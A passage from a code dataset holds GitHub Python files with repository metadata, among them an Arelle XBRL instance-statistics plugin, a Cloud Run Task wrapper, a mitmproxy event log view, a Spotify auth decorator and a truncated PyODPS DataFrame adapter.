blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
6ec7249fb25fcc334c8ba9b5b5d6ce61012c410e | c2e49d32b2613d702dd06067bd0ec7846a319fd5 | /arelle/plugin/instanceInfo.py | 92187ad858d39887fc97f227c0073ceba1900616 | [
"Apache-2.0"
] | permissive | hamscher/Arelle | c9a020a5955a313c14a4db3a4e7122ec9599714c | 64c1beddcc7163e571011faf07a03d8ffe18bb78 | refs/heads/master | 2023-08-24T14:12:49.055954 | 2021-10-17T16:55:56 | 2021-10-17T16:55:56 | 284,703,106 | 0 | 0 | Apache-2.0 | 2020-08-10T15:48:15 | 2020-08-03T13:08:08 | Python | UTF-8 | Python | false | false | 11,510 | py | '''
instanceInfo.py provides information about an XBRL instance
(c) Copyright 2018 Mark V Systems Limited, All rights reserved.
'''
import sys, os, time, math, re, logging
from collections import defaultdict
from arelle.ValidateXbrlCalcs import inferredDecimals, rangeValue
from arelle import ModelDocument
from arelle.ModelInstanceObject import ModelFact
memoryAtStartup = 0
timeAtStart = 0
styleIxHiddenPattern = re.compile(r"(.*[^\w]|^)-(sec|esef)-ix-hidden\s*:\s*([\w.-]+).*")
def startup(cntlr, options, *args, **kwargs):
global memoryAtStartup, timeAtStart
memoryAtStartup = cntlr.memoryUsed
timeAtStart = time.time()
def showInfo(cntlr, options, modelXbrl, _entrypoint, *args, **kwargs):
for url, doc in sorted(modelXbrl.urlDocs.items(), key=lambda i: i[0]):
if not any(url.startswith(w) for w in ("https://xbrl.sec.gov/", "http://xbrl.sec.gov/", "http://xbrl.fasb.org/", "http://www.xbrl.org/",
"http://xbrl.ifrs.org/", "http://www.esma.europa.eu/")):
cntlr.addToLog("File {} size {:,}".format(doc.basename, os.path.getsize(doc.filepath)), messageCode="info", level=logging.DEBUG)
cntlr.addToLog("Heap memory before loading {:,}".format(memoryAtStartup), messageCode="info", level=logging.DEBUG)
cntlr.addToLog("Heap memory after loading {:,}".format(cntlr.memoryUsed), messageCode="info", level=logging.DEBUG)
cntlr.addToLog("Time to load {:.2f} seconds".format(time.time() - timeAtStart), messageCode="info", level=logging.DEBUG)
isInlineXbrl = modelXbrl.modelDocument.type in (ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET)
if isInlineXbrl:
instanceType = "inline XBRL, number of documents {}".format(len(modelXbrl.ixdsHtmlElements))
else:
instanceType = "xBRL-XML"
cntlr.addToLog("Instance type {}".format(instanceType), messageCode="info", level=logging.DEBUG)
numContexts = len(modelXbrl.contexts)
numLongContexts = 0
bytesSaveable = 0
frequencyOfDims = {}
sumNumDims = 0
distinctDurations = set()
distinctInstants = set()
shortContextIdLen = int(math.log10(numContexts or 1)) + 2 # if no contexts, use 1 for log function to work
xbrlQnameCount = 0
xbrlQnameLengths = 0
for c in modelXbrl.contexts.values():
sumNumDims += len(c.qnameDims)
for d in c.qnameDims.values():
dimQname = str(d.dimensionQname)
frequencyOfDims[dimQname] = frequencyOfDims.get(dimQname,0) + 1
xbrlQnameCount += 1
xbrlQnameLengths += len(d.dimensionQname.localName)
if c.isInstantPeriod:
distinctInstants.add(c.instantDatetime)
elif c.isStartEndPeriod:
distinctDurations.add((c.startDatetime, c.endDatetime))
if len(c.id) > shortContextIdLen:
bytesSaveable += len(c.id) - shortContextIdLen
cntlr.addToLog("Number of contexts {:,}".format(numContexts), messageCode="info", level=logging.DEBUG)
cntlr.addToLog("Number of distinct durations {:,}".format(len(distinctDurations)), messageCode="info", level=logging.DEBUG)
cntlr.addToLog("Number of distinct instants {:,}".format(len(distinctInstants)), messageCode="info", level=logging.DEBUG)
cntlr.addToLog("Avg number dimensions per contexts {:,.2f}".format(sumNumDims/numContexts if numContexts else 0), messageCode="info", level=logging.DEBUG)
mostPopularDims = sorted(frequencyOfDims.items(), key=lambda i:"{:0>9},{}".format(999999999-i[1],i[0]))
for dimName, count in mostPopularDims[0:3]:
cntlr.addToLog("Dimension {} used in {:,} contexts".format(dimName, count), messageCode="info", level=logging.DEBUG)
numFacts = 0
numTableTextBlockFacts = 0
lenTableTextBlockFacts = 0
numTextBlockFacts = 0
lenTextBlockFacts = 0
distinctElementsInFacts = set()
factsPerContext = {}
factForConceptContextUnitHash = defaultdict(list)
for f in modelXbrl.factsInInstance:
context = f.context
concept = f.concept
distinctElementsInFacts.add(f.qname)
numFacts += 1
if f.qname.localName.endswith("TableTextBlock"):
numTableTextBlockFacts += 1
lenTableTextBlockFacts += len(f.xValue)
elif f.qname.localName.endswith("TextBlock"):
numTextBlockFacts += 1
lenTextBlockFacts += len(f.xValue)
if context is not None and concept is not None:
factsPerContext[context.id] = factsPerContext.get(context.id,0) + 1
factForConceptContextUnitHash[f.conceptContextUnitHash].append(f)
bytesSaveable += len(context.id) - shortContextIdLen
mostPopularContexts = sorted(factsPerContext.items(), key=lambda i:"{:0>9},{}".format(999999999-i[1],i[0]))
cntlr.addToLog("Number of facts {:,}".format(numFacts), messageCode="info", level=logging.DEBUG)
cntlr.addToLog("Number of TableTextBlock facts {:,} avg len {:,.0f}".format(numTableTextBlockFacts, lenTableTextBlockFacts/numTableTextBlockFacts if numTableTextBlockFacts else 0), messageCode="info", level=logging.DEBUG)
cntlr.addToLog("Number of TextBlock facts {:,} avg len {:,.0f}".format(numTextBlockFacts, lenTextBlockFacts/numTableTextBlockFacts if numTableTextBlockFacts else 0), messageCode="info", level=logging.DEBUG)
cntlr.addToLog("Max number facts per context {:,}".format(mostPopularContexts[0][1] if mostPopularContexts else 0), messageCode="info", level=logging.DEBUG)
cntlr.addToLog("Avg number facts per context {:,.2f}".format(sum([v for v in factsPerContext.values()])/numContexts if numContexts else 0), messageCode="info", level=logging.DEBUG)
cntlr.addToLog("Distinct elements in facts {:,}".format(len(distinctElementsInFacts)), messageCode="info", level=logging.DEBUG)
cntlr.addToLog("Number of bytes saveable context id of {} length is {:,}".format(shortContextIdLen, bytesSaveable), messageCode="info", level=logging.DEBUG)
aspectEqualFacts = defaultdict(list)
numConsistentDupFacts = numInConsistentDupFacts = 0
for hashEquivalentFacts in factForConceptContextUnitHash.values():
if len(hashEquivalentFacts) > 1:
for f in hashEquivalentFacts:
aspectEqualFacts[(f.qname,f.contextID,f.unitID,
f.xmlLang if f.concept.type.isWgnStringFactType else None)].append(f)
for fList in aspectEqualFacts.values():
f0 = fList[0]
if f0.concept.isNumeric:
if any(f.isNil for f in fList):
_inConsistent = not all(f.isNil for f in fList)
elif all(inferredDecimals(f) == inferredDecimals(f0) for f in fList[1:]): # same decimals
v0 = rangeValue(f0.value)
_inConsistent = not all(rangeValue(f.value) == v0 for f in fList[1:])
else: # not all have same decimals
aMax, bMin = rangeValue(f0.value, inferredDecimals(f0))
for f in fList[1:]:
a, b = rangeValue(f.value, inferredDecimals(f))
if a > aMax: aMax = a
if b < bMin: bMin = b
_inConsistent = (bMin < aMax)
else:
_inConsistent = any(not f.isVEqualTo(f0) for f in fList[1:])
if _inConsistent:
numInConsistentDupFacts += 1
else:
numConsistentDupFacts += 1
aspectEqualFacts.clear()
cntlr.addToLog("Number of duplicate facts consistent {:,} inconsistent {:,}".format(numConsistentDupFacts, numInConsistentDupFacts), messageCode="info", level=logging.DEBUG)
styleAttrCounts = {}
totalStyleLen = 0
continuationElements = {}
ixNsPrefix = "{http://www.xbrl.org/2013/inlineXBRL}"
for ixdsHtmlRootElt in getattr(modelXbrl, "ixdsHtmlElements", ()): # ix root elements if inline
for ixElt in ixdsHtmlRootElt.iterdescendants():
style = ixElt.get("style")
ixEltTag = str(ixElt.tag)
if style:
styleAttrCounts[style] = styleAttrCounts.get(style,0) + 1
if styleIxHiddenPattern.match(style) is None:
totalStyleLen += len(style)
if ixEltTag == "{http://www.xbrl.org/2013/inlineXBRL}continuation" and ixElt.id:
continuationElements[ixElt.id] = ixElt
if ixEltTag.startswith(ixNsPrefix):
localName = ixEltTag[len(ixNsPrefix):]
if localName == "continuation" and ixElt.id:
continuationElements[ixElt.id] = ixElt
elif localName in ("nonFraction", "nonNumeric", "fraction"):
xbrlQnameCount += 1
xbrlQnameLengths += len(ixElt.qname.localName)
elif isinstance(ixElt, ModelFact):
xbrlQnameCount += 2
xbrlQnameLengths += len(ixElt.qname.localName)
def locateContinuation(element, chain=None):
contAt = element.get("continuedAt")
if contAt:
if contAt in continuationElements:
if chain is None: chain = [element]
contElt = continuationElements[contAt]
if contElt not in chain:
chain.append(contElt)
element._continuationElement = contElt
return locateContinuation(contElt, chain)
elif chain: # end of chain
return len(chain)
numContinuations = 0
maxLenLen = 0
maxLenHops = 0
maxHops = 0
maxHopsLen = 0
for f in modelXbrl.factsInInstance:
if f.get("continuedAt"):
numContinuations += 1
_len = len(f.xValue)
_hops = locateContinuation(f)
if _hops > maxHops:
maxHops = _hops
maxHopsLen = _len
if _len > maxLenLen:
maxLenLen = _len
maxLenHops = _hops
cntlr.addToLog("Number of continuation facts {:,}".format(numContinuations), messageCode="info", level=logging.DEBUG)
cntlr.addToLog("Longest continuation fact {:,} number of hops {:,}".format(maxLenLen, maxLenHops), messageCode="info", level=logging.DEBUG)
cntlr.addToLog("Most continuation hops {:,} fact len {:,}".format(maxHops, maxHopsLen), messageCode="info", level=logging.DEBUG)
numDupStyles = sum(1 for n in styleAttrCounts.values() if n > 1)
bytesSaveableByCss = sum(len(s)*(n-1) for s,n in styleAttrCounts.items() if n > 1)
cntlr.addToLog("Number of duplicate styles {:,}, bytes saveable by CSS {:,}, len of all non-ix-hidden @styles {:,}".format(numDupStyles, bytesSaveableByCss, totalStyleLen), messageCode="info", level=logging.DEBUG)
cntlr.addToLog("Number of XBRL QNames {:,}, bytes saveable by EBA-style element names {:,}".format(xbrlQnameCount, xbrlQnameLengths - (5*xbrlQnameCount)), messageCode="info", level=logging.DEBUG)
__pluginInfo__ = {
'name': 'Instance Info',
'version': '1.0',
'description': "This plug-in displays instance information for sizing and performance issues.",
'license': 'Apache-2',
'author': 'Mark V Systems Limited',
'copyright': '(c) Copyright 2020 Mark V Systems Limited, All rights reserved.',
# classes of mount points (required)
'CntlrCmdLine.Filing.Start': startup,
'CntlrCmdLine.Xbrl.Loaded': showInfo
}
| [
"[email protected]"
] | |
1031b15ef4224999d0fc93543846634035595c25 | 7f2511240539b1327a5a97060fa59f811bdc2889 | /django_functest/exceptions.py | a95b6b4d9fd5ad70530a83cac35c6ae76290059b | [] | no_license | liushilive/django-functest | e1080c2e8b9031ba9b271bfd56029f0b77082e5a | 8cffd4ae01dd9a004acc0f37088a34ce5b5e0983 | refs/heads/master | 2021-01-20T14:16:23.133597 | 2018-03-30T07:06:22 | 2018-03-30T07:06:22 | 82,748,549 | 0 | 0 | null | 2018-03-30T07:06:23 | 2017-02-22T01:57:10 | Python | UTF-8 | Python | false | false | 297 | py | from __future__ import absolute_import, print_function, unicode_literals
class WebTestNoSuchElementException(Exception):
pass
class WebTestMultipleElementsException(Exception):
pass
class WebTestCantUseElement(Exception):
pass
class SeleniumCantUseElement(Exception):
pass
| [
"[email protected]"
] | |
cbde25477696d51659f3ddfcf455ceb4387eb642 | 6515dee87efbc5edfbf4c117e262449999fcbb50 | /Sorting/AUC.py | c6548f4f09b7421ff5d5d311ff99bde1e848da1e | [] | no_license | wangyunge/algorithmpractice | 24edca77e180854b509954dd0c5d4074e0e9ef31 | 085b8dfa8e12f7c39107bab60110cd3b182f0c13 | refs/heads/master | 2021-12-29T12:55:38.096584 | 2021-12-12T02:53:43 | 2021-12-12T02:53:43 | 62,696,785 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 758 | py | class AucCompute():
def __init__(self):
self.samples = []
samples = [(0.5, 1), (0.6, 1), (0.2, 0), (0.55, 0)]
def compute(self, label, score):
samples = sorted()
def roc_area(self, ):
def true_pos_rate():
return float(tp)/(float(tp) + float(fn))
def false_peg_rate():
return float(fp)/(float(tn) + float(fp))
sample_total = float(len(samples))
pos_total = 0.0
for label, _ in samples:
pos_total += label
neg_total = sample_total - pos_total
last_score =
tp = 0
fn = pos_total /
for label, score in samples:
if label = 1:
tp +=1
else:
fp += 1
| [
"[email protected]"
] | |
fb64b70aa19618482a0dc633386ee2f4f1e330f4 | ec87bf8c5a4617ade5556b6dc4df12a6f1056566 | /Sec_7/7.2/test2.py | 27931f07b2eca51e07f6633e454cb2f415ed34ca | [] | no_license | WiconWang/spider_project | a5772b1bda63695d9e398edd31a3574e568ef0b3 | f49a93c1cab5716d4dafecb7479a3be2a4af91ad | refs/heads/master | 2023-01-24T08:34:20.951665 | 2020-11-25T06:25:04 | 2020-11-25T06:25:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 203 | py | import requests
url = 'http://192.168.6.160:8050/render.png?url=https://www.jd.com&wait=5&width=1000&height=700'
response = requests.get(url)
with open('jd.png', 'wb') as f:
f.write(response.content) | [
"[email protected]"
] | |
bdab442eec0258db57481eaade41c78e4c9425f5 | 6478723d180a8ef39941ba04b80c1eca9f437323 | /1063. Number of Valid Subarrays.py | d2ff3ac378cb81f52d28f7851e45d2f12bbe5249 | [] | no_license | NiuNiu-jupiter/Leetcode | 2a49a365898ecca393cb1eb53a47f4501b25952d | e278ae6ded32f6a2d054ae11ad8fcc45e7bd0f86 | refs/heads/master | 2022-11-22T01:05:57.417538 | 2020-07-28T23:34:39 | 2020-07-28T23:34:39 | 182,104,119 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,174 | py | """
Given an array A of integers, return the number of non-empty continuous subarrays that satisfy the following condition:
The leftmost element of the subarray is not larger than other elements in the subarray.
Example 1:
Input: [1,4,2,5,3]
Output: 11
Explanation: There are 11 valid subarrays: [1],[4],[2],[5],[3],[1,4],[2,5],[1,4,2],[2,5,3],[1,4,2,5],[1,4,2,5,3].
Example 2:
Input: [3,2,1]
Output: 3
Explanation: The 3 valid subarrays are: [3],[2],[1].
Example 3:
Input: [2,2,2]
Output: 6
Explanation: There are 6 valid subarrays: [2],[2],[2],[2,2],[2,2],[2,2,2].
"""
def validSubarrays(nums: List[int]) -> int:
if not nums: return []
"""
res = 0
j = 0
for i in range(len(nums)):
j = i
while j < len(nums):
if nums[i]<=nums[j]:
res+=1
j+=1
else:
break
return res
"""
res, stack = 0, []
for a in nums:
while stack and stack[-1] > a:
stack.pop()
stack.append(a) # 1 2 3
res += len(stack) #1,3,5,8,11
return res
| [
"[email protected]"
] | |
a1acccb1aba90199654cacf3ead931973c054ceb | bc9f66258575dd5c8f36f5ad3d9dfdcb3670897d | /lib/googlecloudsdk/api_lib/run/task.py | c288e4e773ffe47bea82d77e5052543b63594cc1 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | google-cloud-sdk-unofficial/google-cloud-sdk | 05fbb473d629195f25887fc5bfaa712f2cbc0a24 | 392abf004b16203030e6efd2f0af24db7c8d669e | refs/heads/master | 2023-08-31T05:40:41.317697 | 2023-08-23T18:23:16 | 2023-08-23T18:23:16 | 335,182,594 | 9 | 2 | NOASSERTION | 2022-10-29T20:49:13 | 2021-02-02T05:47:30 | Python | UTF-8 | Python | false | false | 3,906 | py | # -*- coding: utf-8 -*- #
# Copyright 2022 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Wraps a Cloud Run Task message with convenience methods."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import enum
from googlecloudsdk.api_lib.run import container_resource
from googlecloudsdk.api_lib.run import k8s_object
from googlecloudsdk.core.console import console_attr
AUTHOR_ANNOTATION = k8s_object.RUN_GROUP + '/creator'
STARTED_CONDITION = 'Started'
COMPLETED_CONDITION = 'Completed'
EXECUTION_LABEL = 'run.googleapis.com/execution'
STATE_LABEL = 'run.googleapis.com/runningState'
class RestartPolicy(enum.Enum):
NEVER = 'Never'
ON_FAILURE = 'OnFailure'
class Task(container_resource.ContainerResource):
"""Wraps a Cloud Run Execution message, making fields more convenient."""
API_CATEGORY = 'run.googleapis.com'
KIND = 'Task'
READY_CONDITION = COMPLETED_CONDITION
TERMINAL_CONDITIONS = frozenset({STARTED_CONDITION, READY_CONDITION})
@classmethod
def New(cls, client, namespace):
"""Produces a new Task object.
Args:
client: The Cloud Run API client.
namespace: str, The serving namespace.
Returns:
A new Task object.
"""
ret = super(Task, cls).New(client, namespace)
ret.spec.template.spec.containers = [client.MESSAGES_MODULE.Container()]
return ret
@property
def author(self):
return self.annotations.get(AUTHOR_ANNOTATION)
@property
def index(self):
return self.status.index or 0
@property
def execution_name(self):
return self.labels[EXECUTION_LABEL]
@property
def running_state(self):
return self.labels[STATE_LABEL] if STATE_LABEL in self.labels else None
@property
def service_account(self):
"""The service account to use as the container identity."""
return self.spec.serviceAccountName
def ReadySymbolAndColor(self):
"""Return a tuple of ready_symbol and display color for this object."""
encoding = console_attr.GetConsoleAttr().GetEncoding()
if self.running_state == 'Running':
return self._PickSymbol('\N{HORIZONTAL ELLIPSIS}', '.',
encoding), 'yellow'
elif self.running_state == 'Succeeded':
return self._PickSymbol('\N{HEAVY CHECK MARK}', '+', encoding), 'green'
elif self.running_state == 'Failed':
return 'X', 'red'
elif self.running_state == 'Cancelled':
return '!', 'yellow'
elif self.running_state == 'Abandoned':
return '-', 'yellow'
return '.', 'yellow'
@property
def start_time(self):
return self.status.startTime
@property
def completion_time(self):
return self.status.completionTime
@property
def retries(self):
if self.status.startTime is not None:
return self.status.retried or 0
return None
@property
def last_exit_code(self):
if (self.status.lastAttemptResult is not None and
self.status.lastAttemptResult.exitCode is not None):
return self.status.lastAttemptResult.exitCode
elif self.status.completionTime is not None:
return 0
return None
@property
def last_exit_message(self):
if (self.status.lastAttemptResult is not None and
self.status.lastAttemptResult.status.message is not None):
return self.status.lastAttemptResult.status.message
return ''
| [
"[email protected]"
] | |
5079e05b86e2723e8d0e70be3749a7efa59a9183 | d10a1814735fa6e7fc9354bad8d8251eb81fa9fc | /core/decorators.py | c9c25be29165176c68365e2285ab55993572af80 | [] | no_license | SeedyROM/django-social-spotify-example | 15d6a43045009e0f28e49f4f832bb0b1b1bbae51 | adb6cc9cfda6d76d45ef9c3611cacfb17ba89831 | refs/heads/master | 2022-12-14T21:49:43.512965 | 2018-03-28T08:40:01 | 2018-03-28T08:40:01 | 127,084,250 | 3 | 0 | null | 2022-12-08T00:55:24 | 2018-03-28T04:36:03 | Python | UTF-8 | Python | false | false | 696 | py | from django.contrib.auth import logout
from django.contrib.auth.decorators import login_required
from django.shortcuts import redirect
from requests.exceptions import HTTPError
from social_django.utils import load_strategy
def spotify_view(function):
@login_required
def wrap(request, *args, **kwargs):
social = request.user.social_auth.get(provider='spotify')
token = social.get_access_token(load_strategy())
try:
return function(request, token, *args, **kwargs)
except HTTPError as e:
print(f'Failed using token because of HTTPError: "{e}"')
return redirect('logout')
wrap.__doc__ = function.__doc__
wrap.__name__ = function.__name__
return wrap
| [
"[email protected]"
] | |
c005b4665be718a64a4934ba60988c4d6d45bf34 | c4d56a69bea9daecab4a6d6dcf64ea40d22eb48e | /mitmproxy/tools/console/eventlog.py | 0b8a3f8cf9167e612d17ad473ade11e91456e26b | [
"MIT"
] | permissive | iBrandon/mitmproxy | 981f44baa8c6ea7cfddafeb38bcf93a853b4c682 | cafa094f75732bd803972aecb71e2d1032ee2390 | refs/heads/master | 2021-01-20T17:29:44.817486 | 2017-05-10T08:11:27 | 2017-05-10T08:11:27 | 90,879,892 | 2 | 0 | null | 2017-05-10T15:28:43 | 2017-05-10T15:28:43 | null | UTF-8 | Python | false | false | 1,315 | py | import urwid
from mitmproxy.tools.console import signals
EVENTLOG_SIZE = 10000
class LogBufferWalker(urwid.SimpleListWalker):
pass
class EventLog(urwid.ListBox):
keyctx = "eventlog"
def __init__(self, master):
self.walker = LogBufferWalker([])
self.master = master
urwid.ListBox.__init__(self, self.walker)
signals.sig_add_log.connect(self.sig_add_log)
def set_focus(self, index):
if 0 <= index < len(self.walker):
super().set_focus(index)
def keypress(self, size, key):
if key == "z":
self.master.clear_events()
key = None
elif key == "m_end":
self.set_focus(len(self.walker) - 1)
elif key == "m_start":
self.set_focus(0)
return urwid.ListBox.keypress(self, size, key)
def sig_add_log(self, sender, e, level):
txt = "%s: %s" % (level, str(e))
if level in ("error", "warn"):
e = urwid.Text((level, txt))
else:
e = urwid.Text(txt)
self.walker.append(e)
if len(self.walker) > EVENTLOG_SIZE:
self.walker.pop(0)
if self.master.options.console_focus_follow:
self.walker.set_focus(len(self.walker) - 1)
def clear_events(self):
self.walker[:] = []
| [
"[email protected]"
] | |
ec1825cba9d2657ee0ecdc2ebb87aed9c258df64 | cdad738a7085a997b5349a94aedb4db8da78da8f | /TreeProduction/test/crab/w01_hijing8tev_gensimtreeproduction/crab.py | c8cf7f7e5455d3f3de7b81e0aec48396bdacec2b | [
"MIT"
] | permissive | tuos/DirectLoopAnalysis | 4851d122d4723e498705c1d2cb100cbf3eda8d43 | 6f5f02538454d2240d0232665b9b17d07eb79854 | refs/heads/master | 2020-06-12T22:24:01.081755 | 2020-01-21T17:49:37 | 2020-01-21T17:49:37 | 194,446,479 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 871 | py | from CRABClient.UserUtilities import config, getUsernameFromSiteDB
config = config()
config.General.requestName = 'w01_hijing8tev_gensimtreeproduction'
config.General.workArea = 'project_w01_hijing8tev_gensimtreeproduction'
config.General.transferOutputs = True
config.General.transferLogs = False
config.JobType.pluginName = 'Analysis'
config.JobType.psetName = 'ConfFile_cfg.py'
config.Data.inputDataset = '/HIJING_pPb_8160_DataBS/pPb816Summer16DR-MB_80X_mcRun2_pA_v4-v2/AODSIM'
config.Data.inputDBS = 'global'
#config.Data.splitting = 'FileBased'
config.Data.splitting = 'Automatic'
#config.Data.unitsPerJob = 1
config.Data.outLFNDirBase = '/store/user/tuos/loops/cumulants/hijing/w01_hijing8tev_gensimtreeproduction'
config.Data.publication = False
config.Data.outputDatasetTag = 'w01_hijing8tev_gensimtreeproduction'
config.Site.storageSite = 'T2_US_Vanderbilt'
| [
"[email protected]"
] | |
4f532fb82b968462c6b2cba3a5fdbc06a4fd47c7 | c2ff2ee2b0c84e047a80cfdf0b0d0b122fc9db79 | /features/himario/mmediting/mmedit/datasets/generation_paired_dataset.py | 2df184d567d46c30260f0faf1c1112ad072dd09d | [
"Apache-2.0",
"MIT"
] | permissive | obarnard99/vilio | 275dcb62cdb8b2d8c55ab1e73f3a796bd2073a5b | 77aac226c3a0910410f11a5999f8908181f57ccd | refs/heads/master | 2023-06-29T17:02:02.282457 | 2021-06-22T09:50:11 | 2021-06-22T09:50:11 | 337,738,373 | 0 | 0 | MIT | 2021-06-22T09:50:12 | 2021-02-10T13:50:49 | Python | UTF-8 | Python | false | false | 1,466 | py | import os.path as osp
from .base_generation_dataset import BaseGenerationDataset
from .registry import DATASETS
@DATASETS.register_module()
class GenerationPairedDataset(BaseGenerationDataset):
"""General paired image folder dataset for image generation.
It assumes that the training directory is '/path/to/data/train'.
During test time, the directory is '/path/to/data/test'. '/path/to/data'
can be initialized by args 'dataroot'. Each sample contains a pair of
images concatenated in the w dimension (A|B).
Args:
dataroot (str | :obj:`Path`): Path to the folder root of paired images.
pipeline (List[dict | callable]): A sequence of data transformations.
test_mode (bool): Store `True` when building test dataset.
Default: `False`.
"""
def __init__(self, dataroot, pipeline, test_mode=False):
super(GenerationPairedDataset, self).__init__(pipeline, test_mode)
phase = 'test' if test_mode else 'train'
self.dataroot = osp.join(str(dataroot), phase)
self.data_infos = self.load_annotations()
def load_annotations(self):
"""Load paired image paths.
Returns:
list[dict]: List that contains paired image paths.
"""
data_infos = []
pair_paths = sorted(self.scan_folder(self.dataroot))
for pair_path in pair_paths:
data_infos.append(dict(pair_path=pair_path))
return data_infos
| [
"[email protected]"
] | |
08f69a4436ba0b5d7c98506b57dd7c74f16f4402 | caa7c209acd1b336fcd6c0f3d9e8a58ba1eb60ad | /test_task1.py | 4d95408c2199cab426d5994c5865354a8c64792e | [] | no_license | herzenuni/sem5-firsttask-04092018-arinasaf11-2 | b60375e511206aac94d0253ae69de6b957a9ffa2 | 10b3cc83ae8bce745e624229592667a1b18c9724 | refs/heads/master | 2021-07-25T14:11:26.582542 | 2018-12-28T13:09:23 | 2018-12-28T13:09:23 | 147,555,605 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 258 | py | import unittest
import task1
class test_task():
def test_func(self):
self.assertEqual(task1.func(2,'hex'), '0x2')
def test_func1(self):
self.assertEqual(task1.func(2), 'два')
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
b5cda5a37001a46ca5df718ba77b4f3d8ec7ebb2 | df55759bac7f788aa0c7ddbc620154ce2625b38a | /odps/runner/df/adapter.py | a32f62298d2cbec3de28231825d05509d93ca8cc | [
"Apache-2.0"
] | permissive | yjjsdu/aliyun-odps-python-sdk | 7b4bb21583d9fc8132157fd03f0ca7af2e410f26 | 72ba6ecc2e70d50a581385fffb4fedd1950ed285 | refs/heads/master | 2021-01-09T20:04:24.357789 | 2017-01-25T02:13:37 | 2017-01-25T02:13:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,481 | py | # encoding: utf-8
# Copyright 1999-2017 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import itertools
import threading
import weakref
from ...models import Table
from ...df.core import DataFrame, CollectionExpr
from ...df.utils import to_collection as to_df_collection
from ...df.expr.core import ExprDictionary
from ...df.expr.dynamic import DynamicMixin
from ...df.expr.expressions import SequenceExpr, Scalar
from ...df.expr.expressions import FilterPartitionCollectionExpr
from ...df.backends.context import context
from ...compat import six, reduce
from ...config import options
from ..core import BaseRunnerNode, RunnerObject, ObjectDescription, EngineType, PortType
from ..utils import gen_table_name, hashable
_df_endpoint_dict = ExprDictionary()
_df_link_maintainer = ExprDictionary()
class DFIntermediateProject(object):
def __init__(self):
self.name = 'mocked_project'
class DFIntermediateTable(Table):
__slots__ = 'intermediate',
def __init__(self, **kwargs):
super(DFIntermediateTable, self).__init__(**kwargs)
self._loaded = True
self.intermediate = True
@property
def project(self):
if self.intermediate:
return DFIntermediateProject()
else:
return self.parent.parent
class DFNode(BaseRunnerNode):
def __init__(self, input_num=1):
super(DFNode, self).__init__("DataFrame", engine=EngineType.DF)
self.marshal({
'inputs': [(idx, 'input%d' % idx, PortType.DATA) for idx in range(1, input_num + 1)],
'outputs': [(1, 'output', PortType.DATA)]
})
def optimize(self):
# feed cache_data backwards
for nm, inp in six.iteritems(self.inputs):
obj = inp.obj
if not hasattr(obj, 'df'):
continue
if obj.df is None or not context.is_cached(obj.df):
continue
for edge in self.input_edges[nm]:
src_output = edge.from_node.outputs[edge.from_arg]
if src_output.obj and not context.is_cached(src_output.obj.df):
context.cache(src_output.obj.df, context.get_cached(obj.df))
if len(self.outputs) != 1:
return False, None
out_port = six.next(six.itervalues(self.outputs))
ep = out_port.obj
if ep is None:
return False, None
df = ep.df
if not self.inputs and isinstance(df, DataFrame):
# direct table input
data_sources = list(df.data_source())
if len(data_sources) == 1 and hasattr(data_sources[0], '_client'):
ep.table = data_sources[0].name
return True, None
elif not self.inputs and isinstance(df, FilterPartitionCollectionExpr) and isinstance(ep.df.input, DataFrame):
# direct partitioned table input
data_sources = list(df.input.data_source())
if len(data_sources) == 1 and hasattr(data_sources[0], '_client'):
ep.table = data_sources[0].name
ep.partitions = ep.df.predicate_string
return True, None
elif context.is_cached(df):
# cached data input
ep.table = context.get_cached(df).name
return True, None
return False, None
class DFExecNode(DFNode):
def __init__(self, bind_df=None, input_num=1, func=None, args=None, kwargs=None):
super(DFExecNode, self).__init__(input_num)
self.parameters.update(dict(args_hash=hash(frozenset(args)), kwargs_hash=hash(frozenset(six.iteritems(kwargs)))))
self.bind_df = bind_df
self.args = args
self.kwargs = kwargs
self.func = func
self.sink = None
def optimize(self):
